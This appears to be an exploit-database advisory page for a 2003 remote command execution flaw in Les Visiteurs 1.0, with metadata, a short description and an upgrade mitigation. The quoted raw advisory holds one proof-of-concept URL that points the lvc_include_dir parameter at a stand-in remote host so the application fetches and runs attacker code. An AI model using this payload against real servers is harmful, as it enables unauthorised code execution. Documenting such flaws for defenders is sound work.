header-logo
Suggest Exploit
vendor:
Les Visiteurs
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Les Visiteurs
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: CVE-2003-0753
CPE: o:les_visiteurs:les_visiteurs:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2003

A problem has been reported in the handling of some types of input by Les Visiteurs

Les Visiteurs is vulnerable to a remote command execution vulnerability due to improper handling of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious code in the lvc_include_dir parameter. This malicious code will be executed on the vulnerable system.

Mitigation:

Users should upgrade to the latest version of Les Visiteurs.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8902/info

A problem has been reported in the handling of some types of input by Les Visiteurs. Because of this, an attacker may be able to execute arbitrary commands on the system. 

http://www.example.com/path/include/config.inc.php?lvc_include_dir=http://backdoor/

Navigation

Suggest Exploit

Services By CQR